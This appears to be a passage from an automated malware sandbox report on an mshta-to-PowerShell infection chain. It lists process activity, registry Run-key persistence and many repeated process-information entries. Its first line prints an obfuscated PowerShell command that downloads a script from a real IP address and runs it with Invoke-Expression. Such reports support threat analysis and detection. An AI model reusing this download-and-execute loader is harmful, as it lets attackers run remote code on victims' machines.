                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4C8500BD pushad ; iretd 0_2_00007FFB4C8500C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4C852315 pushad ; iretd 0_2_00007FFB4C85232D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C86B4FC push ebx; retf 4_2_00007FFB4C86B4FD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C86C8AC pushad ; iretd 4_2_00007FFB4C86C8AD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C8600BD pushad ; iretd 4_2_00007FFB4C8600C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C932D79 push edx; retf 4_2_00007FFB4C932D9A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4C88B4FC push ebx; retf 6_2_00007FFB4C88B4FD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4C88C8AC pushad ; iretd 6_2_00007FFB4C88C8AD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4C8800BD pushad ; iretd 6_2_00007FFB4C8800C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4C882315 pushad ; iretd 6_2_00007FFB4C88232D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4C85B4FC push ebx; retf 8_2_00007FFB4C85B4FD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4C85C8AC pushad ; iretd 8_2_00007FFB4C85C8AD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4C8500BD pushad ; iretd 8_2_00007FFB4C8500C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4C852315 pushad ; iretd 8_2_00007FFB4C85232D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0651368B push ebp; ret 12_2_0651368D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_065136BF push ebp; ret 12_2_065136C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043A6F5 push esi; retf 14_2_0043A6FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh14_2_00441864
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
